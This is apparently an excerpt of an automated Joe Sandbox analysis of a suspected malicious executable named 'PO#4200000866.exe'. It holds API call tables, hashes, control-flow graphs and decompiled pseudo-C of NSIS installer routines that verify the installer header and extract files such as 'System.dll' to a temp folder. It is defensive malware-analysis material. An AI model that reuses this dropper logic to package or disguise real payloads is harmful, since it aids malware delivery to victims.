                                                                                      0x00403f78
                                                                                      0x00403f7b
                                                                                      0x00403f81
                                                                                      0x00403f81
                                                                                      0x00403fa0
                                                                                      0x00403fb1
                                                                                      0x00000000
                                                                                      0x00403fb6
                                                                                      0x00403f1e
                                                                                      0x00403f20
                                                                                      0x00000000
                                                                                      0x00403e95
                                                                                      0x00403e95
                                                                                      0x00403ea1
                                                                                      0x00403eab
                                                                                      0x00403eb1
                                                                                      0x00403eb6
                                                                                      0x00403ec5
                                                                                      0x00403fe3
                                                                                      0x00403fe3
                                                                                      0x00000000
                                                                                      0x00403fe3
                                                                                      0x00403ed4
                                                                                      0x00403f0f
                                                                                      0x00000000
                                                                                      0x00403f0f
                                                                                      0x00403dcc
                                                                                      0x00403dcc
                                                                                      0x00403dcf
                                                                                      0x00403dd1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403ddf
                                                                                      0x00403df1
                                                                                      0x00403df6
                                                                                      0x00403dff
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403e05
                                                                                      0x00403e07
                                                                                      0x00403e14
                                                                                      0x00403e14
                                                                                      0x00403e1d
                                                                                      0x00403e23
                                                                                      0x00403e4b
                                                                                      0x00403e53
                                                                                      0x00000000
                                                                                      0x00403e35
                                                                                      0x00403e36
                                                                                      0x00403e3f
                                                                                      0x00403e45
                                                                                      0x00403e46
                                                                                      0x00000000
                                                                                      0x00403e46
                                                                                      0x00403e41
                                                                                      0x00403e43
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403e43
                                                                                      0x00403e23

                                                                                      APIs
                                                                                        • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                        • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                      • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,75703420), ref: 00403E18
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                      • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F
                                                                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                      • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                      • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                      • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-1664645273
                                                                                      • Opcode ID: 9ad589596c03701d97c40990ff578a6287a3b786827aa7f2c4bed2dea1ef0e5e
                                                                                      • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                      • Opcode Fuzzy Hash: 9ad589596c03701d97c40990ff578a6287a3b786827aa7f2c4bed2dea1ef0e5e
                                                                                      • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 380 40336a-40336e 378->380 387 403243-403251 call 40302e 379->387 388 40315e 379->388 394 403322-403327 387->394 395 403257-40325a 387->395 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 401 40318d-403194 393->401 402 4032de-4032e6 call 40302e 393->402 394->380 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 395->397 398 40325c-403274 call 4035f8 call 4035e2 395->398 426 4032d4-4032d9 397->426 427 4032e8-403318 call 4035f8 call 403371 397->427 398->394 421 40327a-403280 398->421 406 403210-403214 401->406 407 403196-4031aa call 406113 401->407 402->394 411 403216-40321d call 40302e 406->411 412 40321e-403224 406->412 407->412 424 4031ac-4031b3 407->424 411->412 417 403233-40323b 412->417 418 403226-403230 call 406b22 412->418 417->390 425 403241 417->425 418->417 421->394 421->397 424->412 430 4031b5-4031bc 424->430 425->387 426->380 436 40331d-403320 427->436 430->412 432 4031be-4031c5 430->432 432->412 434 4031c7-4031ce 432->434 434->412 435 4031d0-4031f0 434->435 435->394 437 4031f6-4031fa 435->437 436->394 438 403329-40333a 436->438 439 403202-40320a 437->439 440 4031fc-403200 437->440 441 403342-403347 438->441 442 40333c 438->442 439->412 443 40320c-40320e 439->443 440->425 440->439 444 403348-40334e 441->444 442->441 443->412 444->444 445 403350-403368 call 406113 444->445 445->380
                                                                                      C-Code - Quality: 99%
                                                                                      			E004030D0(void* __eflags, signed int _a4) {
                                                                                      				DWORD* _v8;
                                                                                      				DWORD* _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				signed int _v40;
                                                                                      				short _v560;
                                                                                      				signed int _t54;
                                                                                      				void* _t57;
                                                                                      				void* _t62;
                                                                                      				intOrPtr _t65;
                                                                                      				void* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr _t71;
                                                                                      				signed int _t77;
                                                                                      				signed int _t82;
                                                                                      				signed int _t83;
                                                                                      				signed int _t89;
                                                                                      				intOrPtr _t92;
                                                                                      				long _t94;
                                                                                      				signed int _t102;
                                                                                      				signed int _t104;
                                                                                      				void* _t106;
                                                                                      				signed int _t107;
                                                                                      				signed int _t110;
                                                                                      				void* _t111;
                                                                                      
                                                                                      				_t94 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_v12 = 0;
                                                                                      				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                                      				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe", 0x400);
                                                                                      				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe", 0x80000000, 3);
                                                                                      				 *0x40a018 = _t106;
                                                                                      				if(_t106 == 0xffffffff) {
                                                                                      					return L"Error launching installer";
                                                                                      				}
                                                                                      				E00406668(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\PO#4200000866.exe");
                                                                                      				E00406668(0x439000, E00405F83(L"C:\\Users\\Arthur\\Desktop"));
                                                                                      				_t54 = GetFileSize(_t106, 0);
                                                                                      				__eflags = _t54;
                                                                                      				 *0x420f00 = _t54;
                                                                                      				_t110 = _t54;
                                                                                      				if(_t54 <= 0) {
                                                                                      					L24:
                                                                                      					E0040302E(1);
                                                                                      					__eflags =  *0x42a274 - _t94;
                                                                                      					if( *0x42a274 == _t94) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					__eflags = _v12 - _t94;
                                                                                      					if(_v12 == _t94) {
                                                                                      						L28:
                                                                                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                      						_t111 = _t57;
                                                                                      						E00406B90(0x40ce68);
                                                                                      						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                                      						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                      						__eflags = _t62 - 0xffffffff;
                                                                                      						 *0x40a01c = _t62;
                                                                                      						if(_t62 != 0xffffffff) {
                                                                                      							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                                      							 *0x420f04 = _t65;
                                                                                      							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                      							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                      							__eflags = _t68 - _v20;
                                                                                      							if(_t68 == _v20) {
                                                                                      								__eflags = _v40 & 0x00000001;
                                                                                      								 *0x42a270 = _t111;
                                                                                      								 *0x42a278 =  *_t111;
                                                                                      								if((_v40 & 0x00000001) != 0) {
                                                                                      									 *0x42a27c =  *0x42a27c + 1;
                                                                                      									__eflags =  *0x42a27c;
                                                                                      								}
                                                                                      								_t45 = _t111 + 0x44; // 0x44
                                                                                      								_t70 = _t45;
                                                                                      								_t102 = 8;
                                                                                      								do {
                                                                                      									_t70 = _t70 - 8;
                                                                                      									 *_t70 =  *_t70 + _t111;
                                                                                      									_t102 = _t102 - 1;
                                                                                      									__eflags = _t102;
                                                                                      								} while (_t102 != 0);
                                                                                      								_t71 =  *0x420ef4; // 0x52096
                                                                                      								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                                                      								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                                      								__eflags = 0;
                                                                                      								return 0;
                                                                                      							}
                                                                                      							goto L32;
                                                                                      						}
                                                                                      						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                      					}
                                                                                      					E004035F8( *0x420ef0);
                                                                                      					_t77 = E004035E2( &_a4, 4);
                                                                                      					__eflags = _t77;
                                                                                      					if(_t77 == 0) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					__eflags = _v8 - _a4;
                                                                                      					if(_v8 != _a4) {
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					goto L28;
                                                                                      				} else {
                                                                                      					do {
                                                                                      						_t107 = _t110;
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                                      						__eflags = _t110 - _t82;
                                                                                      						if(_t110 >= _t82) {
                                                                                      							_t107 = _t82;
                                                                                      						}
                                                                                      						_t83 = E004035E2(0x418ef0, _t107);
                                                                                      						__eflags = _t83;
                                                                                      						if(_t83 == 0) {
                                                                                      							E0040302E(1);
                                                                                      							L32:
                                                                                      							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                      						}
                                                                                      						__eflags =  *0x42a274;
                                                                                      						if( *0x42a274 != 0) {
                                                                                      							__eflags = _a4 & 0x00000002;
                                                                                      							if((_a4 & 0x00000002) == 0) {
                                                                                      								E0040302E(0);
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                                      						_t89 = _v40;
                                                                                      						__eflags = _t89 & 0xfffffff0;
                                                                                      						if((_t89 & 0xfffffff0) != 0) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v36 - 0xdeadbeef;
                                                                                      						if(_v36 != 0xdeadbeef) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v24 - 0x74736e49;
                                                                                      						if(_v24 != 0x74736e49) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v28 - 0x74666f73;
                                                                                      						if(_v28 != 0x74666f73) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _v32 - 0x6c6c754e;
                                                                                      						if(_v32 != 0x6c6c754e) {
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						_a4 = _a4 | _t89;
                                                                                      						_t104 =  *0x420ef0; // 0x8000
                                                                                      						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                      						_t92 = _v16;
                                                                                      						__eflags = _t92 - _t110;
                                                                                      						 *0x42a274 = _t104;
                                                                                      						if(_t92 > _t110) {
                                                                                      							goto L32;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000008;
                                                                                      						if((_a4 & 0x00000008) != 0) {
                                                                                      							L16:
                                                                                      							_v12 = _v12 + 1;
                                                                                      							_t110 = _t92 - 4;
                                                                                      							__eflags = _t107 - _t110;
                                                                                      							if(_t107 > _t110) {
                                                                                      								_t107 = _t110;
                                                                                      							}
                                                                                      							goto L20;
                                                                                      						}
                                                                                      						__eflags = _a4 & 0x00000004;
                                                                                      						if((_a4 & 0x00000004) != 0) {
                                                                                      							break;
                                                                                      						}
                                                                                      						goto L16;
                                                                                      						L20:
                                                                                      						__eflags = _t110 -  *0x420f00; // 0x19f0
                                                                                      						if(__eflags < 0) {
                                                                                      							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                                      						}
                                                                                      						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                                      						_t110 = _t110 - _t107;
                                                                                      						__eflags = _t110;
                                                                                      					} while (_t110 != 0);
                                                                                      					_t94 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L24;
                                                                                      				}
                                                                                      			}
































                                                                                      0x004030db
                                                                                      0x004030de
                                                                                      0x004030e1
                                                                                      0x004030fb
                                                                                      0x00403100
                                                                                      0x00403113
                                                                                      0x00403118
                                                                                      0x0040311e
                                                                                      0x00000000
                                                                                      0x00403120
                                                                                      0x00403131
                                                                                      0x00403142
                                                                                      0x00403149
                                                                                      0x0040314f
                                                                                      0x00403151
                                                                                      0x00403156
                                                                                      0x00403158
                                                                                      0x00403243
                                                                                      0x00403245
                                                                                      0x0040324a
                                                                                      0x00403251
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403257
                                                                                      0x0040325a
                                                                                      0x00403286
                                                                                      0x0040328b
                                                                                      0x00403296
                                                                                      0x00403298
                                                                                      0x004032a9
                                                                                      0x004032c4
                                                                                      0x004032ca
                                                                                      0x004032cd
                                                                                      0x004032d2
                                                                                      0x004032f1
                                                                                      0x00403301
                                                                                      0x00403313
                                                                                      0x00403318
                                                                                      0x0040331d
                                                                                      0x00403320
                                                                                      0x00403329
                                                                                      0x0040332d
                                                                                      0x00403335
                                                                                      0x0040333a
                                                                                      0x0040333c
                                                                                      0x0040333c
                                                                                      0x0040333c
                                                                                      0x00403344
                                                                                      0x00403344
                                                                                      0x00403347
                                                                                      0x00403348
                                                                                      0x00403348
                                                                                      0x0040334b
                                                                                      0x0040334d
                                                                                      0x0040334d
                                                                                      0x0040334d
                                                                                      0x00403350
                                                                                      0x00403357
                                                                                      0x00403363
                                                                                      0x00403368
                                                                                      0x00000000
                                                                                      0x00403368
                                                                                      0x00000000
                                                                                      0x00403320
                                                                                      0x00000000
                                                                                      0x004032d4
                                                                                      0x00403262
                                                                                      0x0040326d
                                                                                      0x00403272
                                                                                      0x00403274
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040327d
                                                                                      0x00403280
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040315e
                                                                                      0x00403163
                                                                                      0x00403168
                                                                                      0x0040316c
                                                                                      0x00403173
                                                                                      0x00403178
                                                                                      0x0040317a
                                                                                      0x0040317c
                                                                                      0x0040317c
                                                                                      0x00403180
                                                                                      0x00403185
                                                                                      0x00403187
                                                                                      0x004032e0
                                                                                      0x00403322
                                                                                      0x00000000
                                                                                      0x00403322
                                                                                      0x0040318d
                                                                                      0x00403194
                                                                                      0x00403210
                                                                                      0x00403214
                                                                                      0x00403218
                                                                                      0x0040321d
                                                                                      0x00000000
                                                                                      0x00403214
                                                                                      0x0040319d
                                                                                      0x004031a2
                                                                                      0x004031a5
                                                                                      0x004031aa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031ac
                                                                                      0x004031b3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031b5
                                                                                      0x004031bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031be
                                                                                      0x004031c5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031c7
                                                                                      0x004031ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031d0
                                                                                      0x004031d6
                                                                                      0x004031df
                                                                                      0x004031e5
                                                                                      0x004031e8
                                                                                      0x004031ea
                                                                                      0x004031f0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004031f6
                                                                                      0x004031fa
                                                                                      0x00403202
                                                                                      0x00403202
                                                                                      0x00403205
                                                                                      0x00403208
                                                                                      0x0040320a
                                                                                      0x0040320c
                                                                                      0x0040320c
                                                                                      0x00000000
                                                                                      0x0040320a
                                                                                      0x004031fc
                                                                                      0x00403200
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040321e
                                                                                      0x0040321e
                                                                                      0x00403224
                                                                                      0x00403230
                                                                                      0x00403230
                                                                                      0x00403233
                                                                                      0x00403239
                                                                                      0x00403239
                                                                                      0x00403239
                                                                                      0x00403241
                                                                                      0x00403241
                                                                                      0x00000000
                                                                                      0x00403241

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 004030E4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO#4200000866.exe,00000400), ref: 00403100
                                                                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 0040615C
                                                                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO#4200000866.exe,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 00403149
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO#4200000866.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 2803837635-386391527
                                                                                      • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                      • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                      • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                      • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 733 40176f-401794 call 402da6 call 405fae 738 401796-40179c call 406668 733->738 739 40179e-4017b0 call 406668 call 405f37 lstrcatW 733->739 744 4017b5-4017b6 call 4068ef 738->744 739->744 748 4017bb-4017bf 744->748 749 4017c1-4017cb call 40699e 748->749 750 4017f2-4017f5 748->750 757 4017dd-4017ef 749->757 758 4017cd-4017db CompareFileTime 749->758 752 4017f7-4017f8 call 406133 750->752 753 4017fd-401819 call 406158 750->753 752->753 760 40181b-40181e 753->760 761 40188d-4018b6 call 4056ca call 403371 753->761 757->750 758->757 763 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 760->763 764 40186f-401879 call 4056ca 760->764 775 4018b8-4018bc 761->775 776 4018be-4018ca SetFileTime 761->776 763->748 797 401864-401865 763->797 773 401882-401888 764->773 777 402c33 773->777 775->776 779 4018d0-4018db CloseHandle 775->779 776->779 783 402c35-402c39 777->783 781 4018e1-4018e4 779->781 782 402c2a-402c2d 779->782 785 4018e6-4018f7 call 4066a5 lstrcatW 781->785 786 4018f9-4018fc call 4066a5 781->786 782->777 792 401901-402398 785->792 786->792 795 40239d-4023a2 792->795 796 402398 call 405cc8 792->796 795->783 796->795 797->773 798 401867-401868 797->798 798->764
                                                                                      C-Code - Quality: 77%
                                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                      				void* __esi;
                                                                                      				void* _t35;
                                                                                      				void* _t43;
                                                                                      				void* _t45;
                                                                                      				FILETIME* _t51;
                                                                                      				FILETIME* _t64;
                                                                                      				void* _t66;
                                                                                      				signed int _t72;
                                                                                      				FILETIME* _t73;
                                                                                      				FILETIME* _t77;
                                                                                      				signed int _t79;
                                                                                      				WCHAR* _t81;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t86;
                                                                                      
                                                                                      				_t77 = __ebx;
                                                                                      				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                      				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                      				_t35 = E00405FAE( *(_t86 - 8));
                                                                                      				_push( *(_t86 - 8));
                                                                                      				_t81 = L"Call";
                                                                                      				if(_t35 == 0) {
                                                                                      					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
                                                                                      				} else {
                                                                                      					E00406668();
                                                                                      				}
                                                                                      				E004068EF(_t81);
                                                                                      				while(1) {
                                                                                      					__eflags =  *(_t86 + 8) - 3;
                                                                                      					if( *(_t86 + 8) >= 3) {
                                                                                      						_t66 = E0040699E(_t81);
                                                                                      						_t79 = 0;
                                                                                      						__eflags = _t66 - _t77;
                                                                                      						if(_t66 != _t77) {
                                                                                      							_t73 = _t66 + 0x14;
                                                                                      							__eflags = _t73;
                                                                                      							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                      						}
                                                                                      						asm("sbb eax, eax");
                                                                                      						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                      						__eflags = _t72;
                                                                                      						 *(_t86 + 8) = _t72;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) == _t77) {
                                                                                      						E00406133(_t81);
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - 1;
                                                                                      					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                      					__eflags = _t43 - 0xffffffff;
                                                                                      					 *(_t86 - 0x38) = _t43;
                                                                                      					if(_t43 != 0xffffffff) {
                                                                                      						break;
                                                                                      					}
                                                                                      					__eflags =  *(_t86 + 8) - _t77;
                                                                                      					if( *(_t86 + 8) != _t77) {
                                                                                      						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                                      						__eflags =  *(_t86 + 8) - 2;
                                                                                      						if(__eflags == 0) {
                                                                                      							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                      						}
                                                                                      						L31:
                                                                                      						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                      						__eflags =  *0x42a2e8;
                                                                                      						goto L32;
                                                                                      					} else {
                                                                                      						E00406668("C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp", _t83);
                                                                                      						E00406668(_t83, _t81);
                                                                                      						E004066A5(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                      						E00406668(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp");
                                                                                      						_t64 = E00405CC8("C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                      						__eflags = _t64;
                                                                                      						if(_t64 == 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							__eflags = _t64 == 1;
                                                                                      							if(_t64 == 1) {
                                                                                      								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                      								L32:
                                                                                      								_t51 = 0;
                                                                                      								__eflags = 0;
                                                                                      							} else {
                                                                                      								_push(_t81);
                                                                                      								_push(0xfffffffa);
                                                                                      								E004056CA();
                                                                                      								L29:
                                                                                      								_t51 = 0x7fffffff;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					L33:
                                                                                      					return _t51;
                                                                                      				}
                                                                                      				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
                                                                                      				 *0x42a314 =  *0x42a314 + 1;
                                                                                      				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                      				 *0x42a314 =  *0x42a314 - 1;
                                                                                      				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                      				_t84 = _t45;
                                                                                      				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                      					L22:
                                                                                      					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                      				} else {
                                                                                      					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                      					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                      						goto L22;
                                                                                      					}
                                                                                      				}
                                                                                      				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                      				__eflags = _t84 - _t77;
                                                                                      				if(_t84 >= _t77) {
                                                                                      					goto L31;
                                                                                      				} else {
                                                                                      					__eflags = _t84 - 0xfffffffe;
                                                                                      					if(_t84 != 0xfffffffe) {
                                                                                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                      					} else {
                                                                                      						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                      						lstrcatW(_t81,  *(_t86 - 8));
                                                                                      					}
                                                                                      					_push(0x200010);
                                                                                      					_push(_t81);
                                                                                      					E00405CC8();
                                                                                      					goto L29;
                                                                                      				}
                                                                                      				goto L33;
                                                                                      			}


















                                                                                      0x0040176f
                                                                                      0x00401776
                                                                                      0x00401782
                                                                                      0x00401785
                                                                                      0x0040178a
                                                                                      0x0040178d
                                                                                      0x00401794
                                                                                      0x004017b0
                                                                                      0x00401796
                                                                                      0x00401797
                                                                                      0x00401797
                                                                                      0x004017b6
                                                                                      0x004017bb
                                                                                      0x004017bb
                                                                                      0x004017bf
                                                                                      0x004017c2
                                                                                      0x004017c7
                                                                                      0x004017c9
                                                                                      0x004017cb
                                                                                      0x004017d0
                                                                                      0x004017d0
                                                                                      0x004017db
                                                                                      0x004017db
                                                                                      0x004017ec
                                                                                      0x004017ee
                                                                                      0x004017ee
                                                                                      0x004017ef
                                                                                      0x004017ef
                                                                                      0x004017f2
